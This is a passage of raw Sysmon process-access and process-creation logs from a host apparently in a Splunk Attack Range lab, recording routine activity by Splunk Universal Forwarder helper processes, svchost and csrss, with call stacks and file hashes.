14:06:45.395{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.395{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.395{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-95F5-6005-6D05-00000000A301}4240C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.394{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F5-6005-6D05-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.394{59A5CD1D-95F5-6005-6D05-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.897{59A5CD1D-95F6-6005-6F05-00000000A301}61365964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F6-6005-6F05-00000000A301}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:46.737{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:46.737{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-95F6-6005-6F05-00000000A301}6136C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F6-6005-6F05-00000000A301}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.738{59A5CD1D-95F6-6005-6F05-00000000A301}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F6-6005-6E05-00000000A301}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95F6-6005-6E05-00000000A301}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F6-6005-6E05-00000000A301}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.066{59A5CD1D-95F6-6005-6E05-00000000A301}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.924{59A5CD1D-95F8-6005-7105-00000000A301}32325444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F8-6005-7105-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:48.768{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:48.768{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95F8-6005-7105-00000000A301}3232C:\Program 